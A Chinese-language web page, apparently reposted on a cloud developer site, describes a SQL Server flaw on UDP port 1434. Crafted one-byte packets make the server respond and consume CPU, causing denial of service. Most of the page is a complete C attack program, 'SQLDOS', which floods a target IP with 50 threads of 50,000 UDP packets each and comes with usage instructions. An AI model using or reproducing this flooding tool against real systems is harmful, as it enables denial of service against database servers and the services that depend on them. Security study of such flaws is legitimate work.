首頁 > 開發者 > SQL Server

構造特殊的UDP資料包能造成SQL Server伺服器CPU負荷加重漏洞

來源:互聯網
上載者:User
創建阿里雲帳戶,並獲得超過 40 款產品的免費試用版;而企業帳戶則可以享有總值 $1200 的免費試用版。立即註冊!
漏洞描述:
    由於SQL Server對1434連接埠的UDP沒有限制,構造特殊的UDP包,SQL Server就一定會作出回應。如果收到大量的這些UDP包,SQL Server將消耗CPU,來處理這些UDP回應,雖然這不能造成主機當機等嚴重影響,但是CPU使用率將很容易達到100%,從而造成資料庫伺服器負荷加重,對其他服務(比如WEB)能造成拒絕服務。同時,惡意攻擊者只需要對SQL Server發送一個1個位元組的UDP資料,SQL Server將到處發送自己的資料庫伺服器資訊。

解決辦法:
    暫時沒有

測試程式:

// SQLDOS.cpp
//

////////////////////////////////////////////////////////////
//                                                   
// SQLDOS by refdom
//
// Author: refdom.
// Email: refdom@263.net
//
////////////////////////////////////////////////////////////

#include "stdafx.h"
#include <string.h>
#include <stdio.h>

void sendudp (void* v)
{
    int i;
    char buf[1]={'/x02'};
    SOCKADDR_IN addr_in;
    char *targetip;
    targetip=(char*)v;

    SOCKET sock;

    if ((sock=socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP))==INVALID_SOCKET)
    {
        printf("Socket failed.Error:%d/n",WSAGetLastError());
        return;
    }

    const int SNDBUF = 0;
    const int TCPNODELAY = true;
    const int BROADCAST = true;
    
    if (setsockopt(sock, SOL_SOCKET, SO_SNDBUF, (const char*)&SNDBUF, sizeof(SNDBUF))==SOCKET_ERROR)
    {
        printf("Set SO_SNDBUF failed.Error:%d",WSAGetLastError());
        return;
    }
    if (setsockopt(sock, SOL_SOCKET, TCP_NODELAY, (const char*)&TCPNODELAY, sizeof(TCPNODELAY))==SOCKET_ERROR)
    {
        printf("Set TCP_NODELAY failed.Error:%d",WSAGetLastError());
        return;
    }
    if (setsockopt(sock, SOL_SOCKET, SO_BROADCAST, (const char*)&BROADCAST, sizeof(BROADCAST))==SOCKET_ERROR)
    {
        printf("Set SO_BROADCAST failed.Error:%d",WSAGetLastError());
        return;
    }

    addr_in.sin_family=AF_INET;
    addr_in.sin_port=htons(1434);
    addr_in.sin_addr.S_un.S_addr=inet_addr(targetip);

    for (i=1;i<50000;i++)
//發送50000次請求
    {
        if (sendto(sock, buf, sizeof(buf), 0,(sockaddr*) &addr_in, sizeof(addr_in))==SOCKET_ERROR)
        {
            printf("Send failed.Error:%d/n",WSAGetLastError());
            return;
        }
    }
    closesocket(sock);
}

void useage()
{
    printf("******************************************/n");
    printf("SQLDOS/n");
    printf("/t Written by Refdom/n");
    printf("/t Email: refdom@263.net/n");
    printf("Useage: SQLDOS.exe target_ip /n");
    printf("*******************************************/n");
}

int main(int argc, char* argv[])
{
    WSADATA WSAData;
    int i;
    useage();
    if (argc<2)
    {
        return false;
    }
    
    if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
    {
        printf("WSAStartup error.Error:%d/n",WSAGetLastError());
        return false;
    }
    printf("SQLDOS start...");

    for (i=1;i<=50;i++)
    {
        _beginthread(sendudp, 0, (void*)argv[1]);
    }

    Sleep(500000);
    WSACleanup();
    printf("SQLDOS Complete./n");
    return 0;
}  

本文章原先以中文撰寫並發佈於 aliyun.com,亦設英文版本,僅作資訊用途。本網站不對文章的準確性,完整性或可靠性或其任何翻譯作出任何明示或暗示的陳述或保證。如對該文章有任何疑慮或投訴,請傳送電郵至 info-contact@alibabacloud.com 並提供相關疑慮或投訴的詳細說明。職員會於 5 個工作天內與您聯絡,一經驗證之後,即會刪除該侵權內容。

相關關鍵詞:
sql server cpu usage query sql server high cpu usage query php udp server udp web server server cpu udp socket server python udp server
相關文章
sqlserver bcp(資料匯入匯出工具)一般用法與命令詳解_MsSql
SQL Server的複合索引學習【轉載】
SQL Server連結的伺服器 Linked Server
SQLserver中字串尋找功能patindex和charindex的區別
SQL Server資料庫表鎖定原理以及如何解除表的鎖定
sql server記錄檔總結及日誌滿的處理辦法

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

熱門內容

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More